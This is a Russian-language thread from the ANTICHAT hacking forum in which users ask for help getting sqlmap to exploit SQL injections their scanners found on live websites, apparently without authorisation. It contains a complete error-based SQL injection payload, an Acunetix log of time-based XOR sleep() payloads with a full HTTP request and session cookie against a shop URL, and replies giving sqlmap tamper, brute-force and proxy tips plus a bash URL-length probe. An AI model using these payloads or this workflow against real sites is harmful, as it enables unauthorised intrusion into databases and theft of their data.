ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.08.2020, 03:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 5258
Репутация:
0
|
|
Вечер добрый.Не первый раз сталкиваюсь с ситуацией когда сканер показал sql и даже показал базу данных.Но sqlmap почему-то не хочет его брать,говорит нельзя произвести инъекцию.
Ссылка get https://www.example.com/example.php?...test&Product=1. уязвимый параметр "langid". Есть готовый пэйлоад со сканера.
-1%5c%27%2b(select+1+and+row(1%2c1)%3e(select+count (*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64) %2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2c CHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x 3a%2cfloor(rand()*2))x+from+(select+1+union+select +2)a+group+by+x+limit+1))--+1
каким образом можно его указать или подтолкнуть?Кроме --technique=
Есть кто сталкивался и решал такое?
|
|
|
|

28.08.2020, 11:10
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от sosidzh24
sosidzh24 said:
↑
Вечер добрый.Не первый раз сталкиваюсь с ситуацией когда сканер показал sql и даже показал базу данных.Но sqlmap почему-то не хочет его брать,говорит нельзя произвести инъекцию.
Ссылка get
https://www.example.com/example.php?...test&Product=1
. уязвимый параметр "langid". Есть готовый пэйлоад со сканера.
-1%5c%27%2b(select+1+and+row(1%2c1)%3e(select+count (*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64) %2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2c CHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x 3a%2cfloor(rand()*2))x+from+(select+1+union+select +2)a+group+by+x+limit+1))--+1
каким образом можно его указать или подтолкнуть?Кроме --technique=
Есть кто сталкивался и решал такое?
Сам уязвимый параметр можно укозать *, ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой.
|
|
|

28.08.2020, 16:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 5258
Репутация:
0
|
|
[QUOTE = "winstrool, post: 4410186, member: 33917"] Сам уязвимый параметр можно укозать * , ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой. [/ QUOTE]
Видел пост на кодебу, как ребята вставляют пейлоады через preffix и suffix.Но до конца не разобрался
|
|
|
|

04.09.2020, 01:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 7210
Репутация:
0
|
|
Доброго всем. Эту проблему возможно как-то решить? Дохожу до имени бд, дальше никак.

|
|
|
|

04.09.2020, 02:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Сообщение от polzunki
polzunki said:
↑
Доброго всем. Эту проблему возможно как-то решить? Дохожу до имени бд, дальше никак.

Если нет information_schema то sqlmap предлагает брутить таблицы/столбцы. Только так
|
|
|
|

04.09.2020, 02:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
Сообщение от Octavian
Octavian said:
↑
Если нет information_schema то sqlmap предлагает брутить таблицы/столбцы. Только так
ну таблицы можно угодать, как и колонки
|
|
|
|

11.09.2020, 13:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 169390
Репутация:
47
|
|
Сообщение от polzunki
polzunki said:
↑
Доброго всем. Эту проблему возможно как-то решить? Дохожу до имени бд, дальше никак.

Ну судя по скрину, у вас есть уязвимость в УРЛе, а дальше:
- на сервере стоит очень маленький параметр LimitRequestLine или же large_client_header_buffers
- Или же у вас оооооочень длинные запросы
- Ну или же стоит какая-либо WAF, которая вместо 404 отдаёт ошибку 414 (что вряд-ли)
Так что сначала выясните какую максимальную длину поддерживает сервер, банально с помощью bash:
Код:
Code:
baseurl="http://site.com/"; for i in {1..1000}; do baseurl=$baseurl'A'; length=$(echo -n "$baseurl"|wc -c); response=$(curl -I -s "$baseurl" | grep "HTTP\/" | cut -d " " -f 2); echo "Length:$length Response-Code: $response URL: $baseurl"; done
Затем пропустите трафик через свой прокси (burp, charlie..) и посмотрите что идёт от скульмапа
Код:
Code:
sqlmap --proxy /
ну и там уже по обстоятельствам.
|
|
|
|

22.09.2020, 18:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 3379
Репутация:
0
|
|
Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку
.SpoilerTarget" type="button">Spoiler: Лог
The vulnerability affects https://www.site.com/ , ////[*]/.html
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
Path Fragment input ////[*]/.html was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496
- 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737
Original value: Sneaker
HTTP Request
arrow_drop_up
GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key= oxid
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
|
|
|
|

22.09.2020, 22:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
Сообщение от Gutman999
Gutman999 said:
↑
Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку
Spoiler: Лог
The vulnerability affects
https://www.site.com/ , ////[*]/.html
Discovered by
Blind SQL Injection
Attack Details
arrow_drop_up
Path Fragment input
////[*]/.html
was set to
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed: - 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496
- 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737
Original value:
Sneaker
HTTP Request
arrow_drop_up
GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer:
https://www.site.com/
Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key= oxid
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host:
www.site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Если есть rce зачем иньекция?
|
|
|
|

22.09.2020, 23:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 3379
Репутация:
0
|
|
Сообщение от karkajoi
karkajoi said:
↑
Если есть rce зачем иньекция?
Не совсем понял тебя друже. Ты имеешь ввиду php code injection? Я с этим не знаком
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|